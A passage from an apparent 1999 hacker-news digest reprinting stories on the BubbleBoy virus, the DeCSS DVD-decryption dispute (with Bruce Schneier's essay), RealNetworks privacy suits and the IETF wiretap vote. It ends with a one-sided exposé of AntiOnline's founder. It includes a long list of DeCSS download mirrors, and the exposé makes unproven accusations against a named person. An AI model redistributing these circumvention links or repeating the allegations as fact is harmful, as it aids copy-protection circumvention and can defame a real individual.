the legal action against seven people, including an international-level tennis umpire and students studying for their HSC. The company described the discovery last week as "an unauthorised intrusion", but the defendants say they were just web surfers who stumbled across an unsecured web page. They say the file listing the password in plain text had been available to anyone with a web browser since February, and the discovery was not part of a "hack" of the Optus system. The company, which operates the Optusnet, Microplex and DingoBlue services, today dropped legal action against two of the defendants, and says it will be seeking agreement with the other five to do the same. The terms of the settlement remain confidential, but they do not include compensation to the defendants who had their Internet accounts blocked and, in some cases, their computers siezed. The company concedes that the legal action, and the lack of security on the password site, were not good publicity, but says other customers would feel grateful for the company's actions. A spokeswoman says customers' piece of mind is the major concern with any form of intrusion, and she is confident the company had done the 'right thing', even though some observers see the actions as heavy-handed. @HWA 37.0 BubbleBoy Virus Uses HTML ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by scores By viewing this new virus, named Bubbleboy, on the inbox screen of Microsoft's Outlook Express or other web based email clients a user will become infected. It is no longer necessary to open an attachment. Network Associates has posted a new virus definition that stops the virus. (This virus has not yet been reported as infecting anyone, is not destructive, has a patch available and it has been given a low threat rating. But one new feature and it makes all the news sites. Hmmmm, sensational?) C|Net http://news.cnet.com/news/0-1006-200-1433792.html?tag=st.ne.1002.tgif?st.ne.fd.gif.f MSNBC http://www.msnbc.com/news/333265.asp Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500055552-500091363-500335153-0,00.html ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,1018067,00.html?chkpt=zdnntop C|Net; New, fast-spreading email virus found By John Borland Staff Writer, CNET News.com November 9, 1999, 3:15 p.m. PT update A virulent new kind of computer virus triggered simply by opening an infected email message has been identified, antivirus researchers said today. The virus, dubbed "Bubbleboy," apparently hasn't yet made it onto the open Internet, which means researchers haven't heard of any computers being infected. But a version of the program was mailed anonymously to researchers last night, indicating a high potential for future infections. The virus strikes a Seinfeld theme, changing the victim's computer's registered owner to "Bubbleboy," a reference to an episode of the former popular TV show. There are other references to the show in the program: Users' company information is changed to "Vandelay Industries," and "Soup Nazi" also appears in the source code. It appears in mailboxes with a subject line "Bubbleboy is back," researchers said. The virus marks a dangerous step forward in the trend of using email to attack remote computers, researchers say. As with several earlier similar fast-spreading viruses, it takes advantage of security holes in Microsoft Outlook email software to run an unauthorized program on victims' computers, changing information and emailing itself to new targets. Those viruses need a user to click on an email "attachment" in order to be triggered, however. By contrast, Bubbleboy runs as soon as an Outlook user opens an infected email, or even when an Outlook Express user previews a message. "If this got into the wild, it would spread incredibly quickly," said Dan Schrader, an antivirus researcher with Trend Micro. "This would make Melissa look slow." Melissa was successful largely because it automatically sent copies of itself to unsuspecting users via Outlook. Antivirus software initially failed to detect the virus, although Melissa ultimately proved a financial bonanza for antivirus companies. Fears of an even more quickly spreading threat could prompt another surge in antivirus software sales. The new virus requires a user to be running Microsoft's Outlook email program, Windows 95, 98, or 2000, and Internet Explorer 5.0 or higher. It targets a security hole for which Microsoft has already created a fix, but which many users still have yet to use, researchers say. Microsoft did not have a comment on the virus by press time. The development marks a dangerous--if widely predicted--step in virus technology, researchers say. Nevertheless, Bubbleboy itself is relatively benign, aside from its mass email effects. But more malicious programs, carrying effects such as deleting files or programs from a victim's computer, could also theoretically be included in this kind of virus. This style of virus could also be used for more targeted attacks, researchers said. This could include sending programs designed to do specific tasks--such as emailing the contents of an inbox to a third party--to a specific individual. "We used to say that as long as you didn't open an email attachment from someone you don't know, you were fine," said Sal Viveros, group marketing manager for the antivirus division of Network Associates. "Now we've come to the point where you must use antivirus protection if you're going to use email." The patch provided by Microsoft will protect users from this version of Bubbleboy. Antivirus software that scans emails as they come through an ISP or corporate network will also stop the program, as soon as the antivirus companies finish their analysis and update their programs with a filter. Researchers at Network Associates say they suspect the same author who created the recent VBS.Freelink attack. Viveros said his company notified Microsoft and the Federal Bureau of Investigation last night. The companies stress that it is still a potential, rather than an imminent, threat. "We have not seen any instances of infection at all," Trend Micro's Schrader said. "This is not something that people should be panicking over. But it is kind of scary." @HWA 38.0 DVD Decrypters Sued - DeCSS Labeled A 'Good Thing' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench and jmaier At least two programmers involved in creating the DeCSS DVD decryption utility have been contacted by motion picture industry lawyers and have been asked to remove the information regarding the utility DeCSS their Web sites. Members of the Norwegian group "Masters of Reverse Engineering" who came up with the crack have complied with the lawyers request since they can not afford the legal battle. At last count there where over 41 different mirrors in 8 different countries. It is unlikely that the lawyers will be able to shut them all down. Wired http://www.wired.com/news/politics/0,1283,32449,00.html List of Mirror Sites http://www.rhythm.cx/dvd/ Noted Cryptographer Bruce Schneier has called the recent breaking of the DVD encryption a 'good thing'. He goes on to talk about how the DVD encryption scheme was flawed from the start and that it was only a matter of time before someone figured out how to decrypt it. ZD Net http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html Late Update 162515NOV99EST The lawyers are doing what they can. The above list of mirrors has been taken down, however replacements have sprouted up. Mirrored List of Mirrors #1 http://www.lemuria.org/DeCSS/ Mirrored List of Mirrors #2 http://www.humpin.org/decss/ Mirrored List of Mirrors #3 http://www.2600.com/news/1999/1112-files/www.rhythm.cx/ Wired; DVD Hackers Headed to Court? by Declan McCullagh 3:00 a.m. 10.Nov.1999 PST If there's one thing entertainment industry lawyers don't like, it's someone copying CDs or DVDs. But what they really, truly detest are the upstart hackers who discovered how to copy DVD films -- and had the temerity to distribute a program that does just that. Motion picture industry lawyers have reportedly contacted at least two programmers involved in developing the DeCSS utility and asked them to delete information from their Web sites. One of the members of the Norwegian group "Masters of Reverse Engineering" said an Oslo attorney from Simonsen and Musæus, representing the movie industry, has demanded that he remove a link to DeCSS from his Web site. "I know very well that they would not win in court, but they could make a big mess out of it. I simply do not have the time, nor money, to go up against these people," Jon Johansen announced in a letter he posted online Tuesday. He said he decided to yank the link. DVD's security system was intended to be hacker-proof, but MoRE recently figured out how to circumvent it -- a move that could open up illicit trading of digital movies and could cost the entertainment industry millions of dollars. The program, a tiny utility called DeCSS, allows knowledgable users to copy any DVD movie to a .VOB file that ranges between 4.7 and 9.4 GB. Just in case the lawyers get even nastier, the Linux community has a not-so-secret weapon: Mirror sites. By late Tuesday, over a dozen activists had placed copies of DeCSS online, and an index site includes links to all of them. In a post to a Linux-DVD mailing list Tuesday, Derek Fawcus disclaimed all responsibility for the project. "I will have nothing to do with work on DeCSS. If there is any work that I may be considered to have ownership of, I give up all rights to that work," he wrote. Fawcus told Wired News last week that he had rewritten some of the DVD decoder assembler code in the C programming language, and that code was later used in DeCSS. Fawcus wrote in a message last Friday that "the legal side has started" and said that he had been accused of violating a 1998 UK copyright act. That law restricts anyone who "publishes information intended to enable or assist persons to circumvent that form of copy protection." While the US Constitution's First Amendment would probably make such a law in America unenforceable, Congress is debating a controversial anti-circumvention law that would prevent people from decoding or removing security from files and bypassing the rights of copyright owners. Industry groups could not be reached Tuesday for comment. But the Japan-based DVD Forum recently issued a statement condemning the Linux hackers' exploits as "illegal and inappropriate." -=- Mirror list -=- Here is the most recent version of the css-auth CVS code as well as DeCSS. Please mirror & redistribute. This site has limited bandwidth, try to use a mirror first. Please mail additional mirrors and broken links to altair@rhythm.cx. NOTE (Thu, Nov 11, 12:17pm EST): I've recently been informed that a law firm which is likely to be one that would try get these mirrors taken down has been visiting this mirror site as well as others. With that said, there is a possibility that I may have to remove this site in the near future because like everyone else, I can't afford to go to court to fight it. Luckly, it seems fairly unlikely that any law firm will ever be able to get rid of all these mirrors at this point (there are currently 41 in 8 different countries and this list is growing every day). However, I have only seen very few mirror _lists_ like this one anyplace. If anyone has the resources, it might be wise to mirror this list of mirrors as well so that the right people will still know that these mirrors exist. css-auth.tar.gz - The code form an open source DVD project. DeCSS.zip - A Win32 binary for decrypting DVD data streams. MD5 Sums: 5b8347b8b857f8470b8dbd9a905fc194 css-auth.tar.gz d0aff684327a5c7bf110951e42ec3cae DeCSS.zip The Md5 sum shown here for css-auth.tar.gz may be different from some other people's as I rebuilt this archive myself. It was originally downloaded from the main site as a zip file. Page last updated: Fri, Nov 12, 2:55pm EST Current Mirrors (49 so far): http://www.rhythm.cx/dvd/css-auth.tar.gz and http://www.rhythm.cx/dvd/DeCSS.zip http://home.worldonline.dk/~andersa/download/DeCSS.zip http://douglas.min.net/~drw/css-auth/ http://www.devzero.org/freecss.html http://home.t-online.de/home/skinner01/decss.zip http://www.chello.nl/~f.vanwaveren/css-auth/css-auth.tar.gz http://www.geocities.com/ResearchTriangle/Campus/8877/index.html http://www.angelfire.com/mt/popefelix/ http://www.vexed.net/CSS http://members.brabant.chello.nl/~j.vreeken/ http://gullii.stu.rpi.edu/dvd/files/DeCSS.zip and http://gullii.stu.rpi.edu/dvd/files/css-auth.tar.gz http://www.dvd.eavy.de/css-auth.tar.gz http://www.eavy.net/stuff/dvd/css-auth.tar.gz and http://www.eavy.net/stuff/dvd/DeCSS.zip http://www.dynamsol.com/satanix/DeCSS.zip http://www.dvd.eavy.de/DeCSS.zip http://frozenlinux.com/civ/decss/ http://www.humpin.org/decss/ http://www.unitycode.org/ http://dirtass.beyatch.net/decss.zip http://sharedlib.org/decss.zip http://decss.tripod.com/index.html http://www.free-dvd.org.lu/ ftp://134.173.94.44/ http://www.angelfire.com/in2/mirror/ http://mclaughlin.orange.ca.us/~andrew/ http://www.dynamsol.com/satanix/css-auth.tar.gz http://batman.jytol.fi/~vuori/dvd/ http://www.zpok.demon.co.uk/deCSS/CSS.html http://plato.nebulanet.net:88/css/ ftp://alma.dhs.org/pub/DVD/ http://www.d.umn.edu/~dchan/css/ http://www.logorrhea.com/main.html http://people.delphi.com/salfter/LiVid.tar.gz http://www.theresistance.net/files.html ftp://193.219.56.32/pub/dvd/LiVid.CVS-11.06.tar.gz and ftp://193.219.56.32/pub/dvd/LiVid.CVS-11.06.css-stuff-only.tar.gz http://merlin.keble.ox.ac.uk/~adrian/css/index.html http://www.dvd-copy.com/ http://www.zip.com.au/~cs/dvd/css/css-auth.tar.gz and http://www.zip.com.au/~cs/dvd/css/DeCSS.zip http://www.sent.freeserve.co.uk/css-auth.tar.gz and http://www.sent.freeserve.co.uk/DeCSS.zip http://members.tripod.lycos.nl/jvz/ http://joe.to/storage/files/decss.zip ftp://ftp.firehead.org/pub/ http://www.lemuria.org/DeCSS/ http://members.theglobe.com/avoiderman/dvd.htm http://remco.xgov.net/dvd/ http://www.able-towers.com/~flow/ ftp://dvd:dvd@206.98.63.136 http://www.twistedlogic.com/html/tl_archive_map.htm http://dvdcracked.tvheaven.com/index.html This site contains some good technical documentation as well as more source code that the DVD consorium's layers would rather you not see: http://crypto.gq.nu/ Local Mirror: http://www.rhythm.cx/dvd/crypto.gq.nu Broken Mirrors (These are listed here for the notification of the people who run them. I don't know who runs which mirrors; I delete their email once I've added their site in order to ensure their annonymity in the event that the DVD consortium's layers start gnawing at my ankles as well.) ftp://mikpos.dyndns.org/pub/cssdvd.zip ZDnet; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- DVD encryption break is a good thing By Bruce Schneier, ZDNN November 11, 1999 9:23 AM PT URL: http://www.zdnet.com/zdnn/stories/comment/0,5859,2391975,00.html The scheme to protect DVDs has been broken. There are now freeware programs on the Internet that remove the copy protection on DVDs, allowing them to be played, edited, and copied without restriction. This should be no surprise to anyone, least of all to the entertainment industry. The protection scheme is obviously flawed in several ways. Each DVD is encrypted with something called Content Scrambling System (CCS). It has a 40-bit key. (I have no idea why. The NSA and the FBI don't care about DVD encryption. There aren't any terrorist movies they need to be able to watch.) It's not even a very good algorithm. But even if the encryption were triple-DES, ths scheme would be flawed. Every DVD player, including hardware consoles that plug into your television and software players that you can download to your computer, has its own unique unlock key. This key is used to unlock the encryption key on the DVD. Every DVD has 400 copies of the same decryption key, each encrypted with every unlock code. Note the global secret: if you manage to get one unlock key, you can decrypt every DVD. But even if this were all perfect, the scheme could never work. The software player eventually gets the decryption key, decrypts the DVD, and displays it on the screen. That decrypted DVD data is on the computer. It has to be; there's no other way to display it on the screen. No matter how good the encryption scheme is, the DVD data is available in plaintext to anyone who can write a computer program to take it. And so is the decryption key. The computer has to decrypt the DVD. The decryption key has to be in the computer. So the decryption key is available, in the clear, to anyone who knows where to look. The DVD software manufacturers were supposed to disguise the decryption program, and the playing program, using some sort of software obfuscation techniques. These techniques have never worked for very long; they only seem to force hackers to spend a couple of extra weeks figuring out how the software works. I've written about this previously in relation to software copy protection; you can't obfuscate software. It might be a bitter pill for the entertainment industry to swallow, but software content protection does not work. It cannot work. You can distribute encrypted content, but in order for it to be read, viewed, or listened to, it must be turned into plaintext. If it must be turned into plaintext, the computer must have a copy of the key and the algorithm to turn it into plaintext. A clever enough hacker with good enough debugging tools will always be able to reverse-engineer the algorithm, get the key, or just capture the plaintext after decryption. And he can write a software program that allows others to do it automatically. This cannot be stopped. If you have secure hardware, you can prevent it. The attack works because the hacker can run a debugger and other programming tools. If the decryption device and the viewing device (it must be both) is inside a tamperproof piece of hardware, the hacker is stuck. He can't reverse-engineer anything. But tamperproof hardware is largely a myth, so in reality this would just be another barrier that someone will eventually overcome. One more lesson, and an observation. The lesson: This is yet another example of an industry meeting in secret and designing a proprietary encryption algorithm that ends up being embarrassingly weak. I never understand why people don't use free, public, encryption algorithms. They're almost always better. The observation: One solution that the entertainment industry has been pushing for is to make reverse-engineering illegal. They managed in the United States: the Digital Millennium Copyright Act includes provisions to this effect, despite the protests of the scientific and civil rights communities. (Yes, you can go to jail for possessing a debugger.) This "solution" does not work and makes no sense. First, unless reverse-engineering is illegal everywhere on the planet, someone will be able to do it somewhere. And one person is all you need; he can write software that everyone else uses. Second, the reverse-engineer can--like in this case--work anonymously. Laws wouldn't have helped in this case. And third, laws can't put the cat back into the bag. Even if you could catch and prosecute the hackers who did this, it wouldn't affect the hacker tools that have already, and continue to be, written. The fatal flaw is that the entertainment industry is lazy, and are attempting to find a technological solution to what is a legal problem. It is illegal to steal copyrights and trademarks, whether it is a DVD movie, a magazine image, a Ralph Lauren shirt, or a Louis Vitton handbag. This legal protection still exists, and is still strong. For some reason the entertainment industry has decided that it has a legal right to the protection of its technology, and that makes no sense. This DVD break is a good thing. It serves no one's interests for the entertainment industry to put their faith in a bad security system. It is good research, illustrating how bad the encryption algorithm is and how poorly thought out the security model is. What is learned here can be applied to making future systems stronger. Bruce Schneier is CTO of Counterpane Internet Security, Inc., based in San Jose, Calif @HWA 39.0 Class Action Suits Brought Against RealNetworks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond And Lamer Two class action law suits, one in Pennsylvania and another in California, have been filed against RealNetworks. The suits allege that RealNetworks invaded users privacy by collecting information about them without their knowledge when they used RealJukebox. Such collection of data allegedly violates the federal Computer Fraud and Abuse Act as well as California business statutes. The California lawsuit reportedly seeks compensatory and punitive damages of $500 per user. Wired http://www.wired.com/news/politics/0,1283,32459,00.html South China Morning Post http://www.technologypost.com/business/DAILY/19991110105842581.asp?Section=Main Wired; RealNetworks in Real Trouble Wired News Report 9:15 a.m. 10.Nov.1999 PST Internet music consumers took RealNetworks to court Wednesday over recently discovered user-tracking behavior in the company's Internet music software. In a class-action suit filed in the Federal District Court for the Eastern District of Pennsylvania, the plaintiffs charged that RealNetworks violated federal and state law by misrepresenting the use and collection of personal data by users of the RealJukebox software. "This action is being filed on behalf of the millions of users of the RealJukebox software to obtain compensation and other relief for the violations of federal and state law alleged in the complaint," said Jonathan Shub, a member of law Pennsylvania law firm Sheller, Ludwig & Badey, in a statement. "RealNetworks must be held accountable for its conduct." The suit accuses RealNetworks of assigning a GUID (global unique identifier) to each RealJukebox user without the user's knowledge, then compiling information about people's music-listening habits. RealNetworks violated the federal Computer Fraud and Abuse Act as well as state privacy laws and consumer protection statutes, according to the complaint. The action is similar to a suit filed last week in California against RealNetworks for invasion of privacy, trespass, and unfair competition. The Pennsylvania plaintiffs want refunds for the software, and want RealNetworks to provide access to the information that it collected. The suit also asks the company to publish a remediation plan on its Web site. The suits came following the recent discovery that as users listened to Internet music, the RealJukebox software was transmitting detailed user data back to the company. South China Morning Post; BUSINESS RealNetworks slapped with privacy lawsuit NEWSBYTES Jeffrey Wilens wants RealNetworks to face the music, and he has gone to court in Santa Ana, California to make them do so. According to the class-action lawsuit filed in the Orange County Superior Court, Wilens, an attorney who practices consumer protection law, alleges that RealNetworks violated California business statutes (Business & Professions Code, 17200, et seq.) when it failed to pay users of RealJukebox the market value of the information it captured, or uploaded, from their computers. RealNetworks has previously admitted that its RealJukebox assigned a personal ID number to users and uploaded information about their listening habits to its servers. However, the company also released a patch to disable the ID number, and said that it used the data only for personalising the service and never sold it to third parties. Mr Wilens is reported in InternetNews as having compared RealNetwork's actions in acquiring the information as the equivalent of home burglary. The lawsuit reportedly seeks compensatory and punitive damages of $500 per user in the State of California. When extrapolated out, total damages, if Mr Wilens is successful, could reach US$500 million based on his estimate that one million of the more than 16 million RealJukebox users reside in California. Jeffrey Spencer, the attorney handling Mr Wilen's' case, said that the $550 per user figure was a "floor" figure as to the amount of damages, and that further discovery into RealNetworks actions could significantly raise the amount of individual damages sought. Punitive damages are being asked because it is alleged that the statements RealNetworks had made to consumers about use of their personal information were misleading. Mr Spenser also said that his client would not have used RealJukebox if he had known that the Web site had the technology of collecting an extensive amount of personal data. Mr Spencer said: "If they weren't using the information, why were they collecting it?" He indicated that he wants to find out exactly what uses were made of the information. Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved. @HWA 40.0 IETF Rejects Internet Wiretapping Proposals ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by The Seventh Sign The Internet Engineering Task Force, the ad-hoc group that decides Internet standards, has categorically rejected the idea of internet wiretaps. Of course companies that make routers and other hardware are still required to include legal wiretap capabilities into their products. Wired http://www.wired.com/news/politics/0,1283,32455,00.html PC World http://www.pcworld.com/pcwtoday/article/0,1510,13758,00.html Wired; IETF Says 'No Way' to Net Taps by Declan McCullagh 3:00 a.m. 11.Nov.1999 PST WASHINGTON -- The Internet's standards-setting body has decisively rejected the idea of Net wiretaps. Members attending the Internet Engineering Task Force's meeting decided overwhelmingly on Wednesday not to provide wiretap capabilities for governments that want to conduct surveillance online. After a surprisingly polite debate that lasted about an hour, fewer than 25 attendees of the roughly 800-person audience voted for the proposal. Hundreds raised their hands to object to it, while dozens abstained. One common complaint was that inserting wiretap functionality into standards makes them less secure, something the IETF has long opposed. "It would be like having the Christian Coalition debating a protocol for third-trimester abortions," said Phill Hallam-Baker, a networking security expert. Many governments, including the United States, require telephone companies to configure their networks so police can easily wiretap calls. As more phone calls flow through the Internet, the FBI has asked the IETF to consider allowing similar lawful surveillance. But the libertarian-leaning attendees would have none of it. "This is not an area the IETF should be getting into," said Robert Moskowitz, the former chairman of an IETF security working group. "This is something that cannot be done right." Two of the few people who spoke in favor of the concept came from Cisco, a company that could be required to support wiretapping -- whether or not the IETF makes the feature easy to implement. "I'm a little concerned about [this anti-wiretap sentiment]. Clearly not all wiretapping is illegitimate," one Cisco engineer said. "It is legal. It is the law. Most of our customers already require it," said Brian Rosen of Fore Systems, which builds networking hardware. "We're going to take a protocol that is designed here and we're going to modify it. I assure you that a very large number of [companies] will implement the one with the tap," he said. The Internet Engineering Steering Group and the Internet Architecture Board will publish a formal IETF position paper based on the rough consensus of the audience and the views expressed during the debate. "It is the first round in what will prove to be a very long-running debate. It's a good starting point," said Jim Dempsey of the Center for Democracy and Technology. -=- From PC World Online Just Say No to Wiretap Protocols Internet group IETF rejects Net-watching as "repugnant," but wiretapping protocols already proliferate. by Margret Johnston, IDG News Service November 12, 1999, 12:05 a.m. PT Should protocols be designed to help law enforcement officials wiretap the Internet? Members of the Internet Engineering Task Force, or IETF, say no. In an informal vote Wednesday night, the group overwhelmingly rejected adding protocols to support such action. The vote came as a show of hands at the end of a discussion during a plenary meeting attended by about 2000 of the worldwide standards-setting body who have been meeting in Washington, D.C. all week. The majority opinion may be clear. But the poll resolved only the political part of the debate, leaving the technical issues unanswered, according to the head of the task force. "Clearly, there was a majority who found the concept of wiretapping repugnant," says Fred Baker, chairman of the IETF. But the IETF recognizes that existing protocol features used commercially, such as conference call bridges, could also be used by law enforcement for wiretapping, Baker says. Members present did not agree that current U.S. law requires creating a protocol designed for wiretapping. But the FBI's interpretation is clear: engineers designing the protocols must build in wiretapping capability, according to Barry Smith, an agent at the FBI's Digital Telephony and Encryption Policy unit. One reason is the Communications Assistance for Law Enforcement Act of 1994, which requires carriers to use systems that include wiretap capability. The act doesn't cover the Internet, but its reach is blurred as voice telephony moves to the Internet. Privacy Groups Lobby Members who participated in Wednesday night's discussion also expressed a range of opinions, often disagreeing with each other. One speaker declared designing protocols to assist wiretapping is "beyond state of the art" now. Another said whatever the IETF does could become irrelevant anyway if appealed to the Federal Communications Commission. This week, the IETF received an open letter signed by 63 privacy advocates, computer security specialists, computer technology educators, lawyers, and executives, urging the group not to adopt new protocols to facilitate wiretapping. The letter says such a development will harm security, fail to prevent crime, and would be inconsistent with previous IETF actions. When the vote came, only a few hands went up to the question, "Should the IETF support protocol features whose sole use is for wiretapping?" At least 60 percent of the members present voted no and the rest abstained. "If there was any one consensus that came out last night, I would say it's that the IETF in a political sense, not a technical sense, finds the idea of invasion of privacy pretty unpalatable," Baker says. "That's not something we would like to make easy." But Baker acknowledges there's more to the subject. IETF will issue a statement on the topic, probably within a future IETF communiqué on privacy, Baker says. @HWA 41.0 John Vranesevich, AntiOnline, Slashdot and the Synthesis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by bronc Sometime today Slashdot.org will be publishing an interview with John Vranesevich of AntiOnline. The interview will consist of questions posted by Slashdot readers. Slashdot.org http://www.slashdot.org Not sure who John Vranesevich is? Want to know what all the hubbub is about? Check out this new article by Bronc Buster who gives a fairly good chronological account of the events surrounding John Vranesevich and his site. The Synthesis http://www.thesynthesis.com/tech/antionline/index.html And just in case you missed them them first time around here is some background information for you. Forbes - Go Ahead and Sue http://www.forbes.com/columnists/penenberg/1999/0927.htm CyberWire Dispatch, August 1999 - Jacking in From the "Pine-Sol" Port http://www.hackernews.com/orig/CWD0899.html Ottawa Citizen - Spy vs. Spy in the Hacker Underworld http://www.attrition.org/negation/ottawa.html Letter from Ken Williams http://www.hackernews.com/orig/williams.html And so that people don't think we are playing favorites here is a positive article. NY Times http://www.nytimes.com/library/tech/99/10/cyber/articles/08hackers.html Note: Many of these articles have been printed in these pages before, some have been reprinted here for reference purposes. - Ed The Synthesis Article by bronc buster; If you are familiar with the Internet I am sure you know that there are millions of sites online covering everything from how to change a flat tire to how to get rich quick. As you may also know, there are a ton of nuts out there, and self-proclaimed "kings of the Internet" who are online gods in their own minds. Well I am going to tell you a tale about John Vranesevich, or "JP," as he likes to be called online. JP runs a site called antionline.com, which he proclaims is a sort of headquarters for people fighting hackers around the world. He boasts on his web site about working closely with the U.S. Military, NASA, the Defense Information Systems Agency and the FBI to help track, stop and catch evil, criminal hackers. This is his mission, and he lets nothing and no one stand in his way. In his mind, JP stands supreme with a big bank account and ample resources to back him up. So, tell me if this sounds familiar to you: Have you ever gone into a "chat room" or got on IRC and witnessed a user getting mad and blubbering that they were going to "get" someone they were mad at? They might say that they know how to find out where that someone lived, like they were some sort of "Internet cop," and that they had some sort of mystical powers to get a person in big trouble if s/he didn't immediately stop whatever offensive actions s/he had perpetrated. If you have ever seen anything like this happen, then this story won't be a new one, just maybe a bit more complex and a bit more interesting. John "JP" Vranesevich started out in Pennsylvania, in a city that he says had very limited computer resources. He boasts that, when he was 15 years old, he was the driving force behind getting a computer lab upgraded from five to 75 computers. But wait a second; a little digging will produce three different quotes, instances in which he said three different things (see end of story for references). First he said it was in a public library computer lab, and that he helped it grow from five to 75 computers; in another quote he said it was his old high school's computer lab, and it went from 50 to 600 computers. Once JP was out of high school, he moved on to the University of Pittsburgh, a fine institution of higher learning, enrolling in a computer science-related major. As all Freshman are required to, he had to live in the dorms at PITT, which are said to be some of the finest dorms in the country. They are wired with Ethernet connections giving students unlimited access to the Internet, which was ideal for a new student wanting to learn more in the field of computing sciences. As he entered school, JP also started a small personal Web site on an Internet account he got from a friend. Or was it an account from a local Internet Provider that he was given in thanks for helping set up that lab earlier? That point is also unclear; it appears he has claimed both. At any rate, this was the beginning of AntiOnline. Soon after he moved into the dorms and saw he had unlimited access to the Internet, he decided to move his project site into his room and started running antionline.com off of a small computer running Windows NT. Even though JP had signed an agreement to obey the rules regarding use of his Internet connection—rules which strictly forbid running any type of server like he was—he pushed ahead thinking he was protected by his right to freedom of speech. As he became a fledging hacker wannabe in the underground community, JP started to make friends and because his unlimited access to the 'Net was so rare back then, he started to give out e-mail accounts, space for people to put up Web sites, and began trading in stories of the latest hacker exploits. I had an account on his box back then; in fact, I had several accounts. However, in his conversations with the coordinator of residential computer services at Pitt, Lee Bannister, JP said he never did such things and that his server was just a personal box he experimented with. Needless to say, it didn't take long for the authorities at Pitt to see what JP was doing. After he was contacted by a group in Spain about releasing a new type of Windows attack (the infamous Win-Nuke) via his site, his traffic went up and the authorities took notice. At first they contacted JP and told him what he was doing was illegal and asked him politely to stop. He simply ignored the warning. Next they disconnected his room's Internet access and advised him to reread the agreement he had signed. JP ignored them and just moved his box to a friend's room, where he went back online. Then, after he was caught several times in the school's computer labs attempting to launch Denial of Service attacks against several Internet Service Providers across the country, he was brought up on charges regarding his use of dorm Internet access. JP was threatened with expulsion from Pitt. "What!?" cried JP. "They are restricting my freedom of speech!" His friends and hackers from across the underground community rallied to his aid—at the time, it reminded me of that really poor movie called Hackers, in which, at the end, hackers from around the globe unite to stop some evil company from taking over the world, or something like that. JP was invited to be a guest on a weekly hacker radio show in New York City called "Off The Hook," which is done by the fine people at 2600 Magazine. He was invited to talk about his problems at Pitt and people responded by e-mailing, calling and writing the authorities at Pitt who were doing this to poor JP. Soon the noise that the underground was making started to get noticed by the mainstream media and stories started popping up. Under the pressure of all the media attention, Pitt agreed to back down, but only if JP agreed to obey their rules from then on. He agreed. Only a few weeks later, the Internet access in JP's dorm room was cut off again, and again he started to complain about Pitt unjustly targeting him. He said that because of the way he was treated, he decided to drop out of school and work on AntiOnline full time. What a bold, brave move. After only one semester, at the tender age of 19, JP was quitting school, not wanting to bother with learning any longer and heading out with what he knew to take on the world. When I contacted Pitt several months ago, Lee Bannister told me the reason JP's Internet access was cut off was that he had again broken their rules and put his server back up in his dorm room. Ken Service, the spokesmen for Pitt, said in a public statement that all the documents regarding his case were on file at Pitt, and said that the school "had really made a genuine effort to assist him [JP] in running the site within the policies and restrictions of the University." JP was still riding high on his chariot of fame when some of his friends told him about a hack they had done. He figured it would be cool to do a little story about how elite his pals were, and put up a little story on his site for everyone to read. After a few weeks, more people started telling JP of their exploits and soon AntiOnline was a regular stop for people who wanted to see the latest hack or the status of the latest online hacker gang war. Then one day, a story popped up about how hackers who JP knew had broken into several systems at an Indian nuclear research center and stolen documents and e-mails regarding recent nuclear tests conducted near the border of Pakistan. Because this was such a hot bed issue in the news at the time, the mainstream media jumped all over it. JP recounted in several interviews how he was in his parents' living room fielding calls from everyone from the FBI to the Department of Defense to various nuclear research centers across the country. The next day JP was on the CBS News, quoted in the New York Times, talked about on CNN and was referred to by countless other media outlets. This was the chance that JP had hoped and waited for—finally, big-time exposure for him and his site. When he was later interviewed by Lewis Z. Koch, of the Cyber Wire Dispatch, regarding the validity of these events, JP incorrectly said that it was a research center in Israel that was hacked, and that he hadn't really witnessed any of the hacks himself, he was just going on the word of the 12- and 14-year-old kids who said they did it. JP never released any of the documents he said he was given, but somehow he had little snippets translated for him so he could post tidbits on his site. One day early last year, JP was contacted by some people who knew little about the fledgling Internet, and somehow decided that it would be a good idea to invest somewhere around $250,000 in JP and AntiOnline. Who would do such a thing and take such a risk? To tell the truth, no one is sure. According to an article in the New York Times, it was a large arts and crafts company in Ohio called Darice Inc., but when contacted, the company spokespeople said they had no idea who John Vranesevich was, and knew nothing about any Web site called antionline.com. When I informed Matt Richtel, the reporter who had done the New York Times story, that the name of the company he was given for his story was bogus, he asked me to ask JP. He wanted to know—as much as I did—if and why JP had lied. With the cash, JP got an office, set up some computers, got a high-speed connection to the Internet and hired an old friend to help run things. From there, he started to get sponsors, expand his empire and got people to write articles for him. It was an interesting time, to say the least. His site was one of the first of its kind to get investment capital and to go commercial, another note that the media was quick to pick up on. Once his site was back up and all his ducks were in a row, JP went back to doing what he did best—reporting on the things his friends did, mixing in news blurbs from time to time. Soon things started to change for JP and his site. After people (kids, really) started to see that they could get some much-desired attention (maybe their parents weren't giving them enough), they started to manufacture hacks specifically for AntiOnline and JP. It used to be that Web page hacks had some sort of reasoning behind them (most of the time), but soon they started to be more and more brainless. The hacks started being nothing more than a few cuss words and a friendly hello to JP and AntiOnline, in hopes of bettering their chances of getting a small story and making them famous for a few days. It was starting to become clear—JP was almost encouraging crimes so that he would have something to report on. The more stories JP had, the more hits he could maintain. The more hits he had, the more his sponsors would pump resources into AntiOnline. It was simple economics, supply and demand, and JP wasn't going to disappoint. At the rate JP was going, it didn't take long for other people to start to see through his façade and to see what he was really up to. It became clear that JP had started to put a glitz on stories, and was taking editorial liberties when reporting on them in order to sensationalize them. JP denies ever doing any such things, of course. A story that JP reported once comes to mind, one about a group of kids who had broken into the Defense Information Systems Agency and stole a "Top Secret" program that outlined networks for the military and the Pentagon. Reportedly, JP had gotten to see some of the information that came with this program and he said that, via his "sources" in the government, he was able to verify that this program was real. JP was on CBS News a few 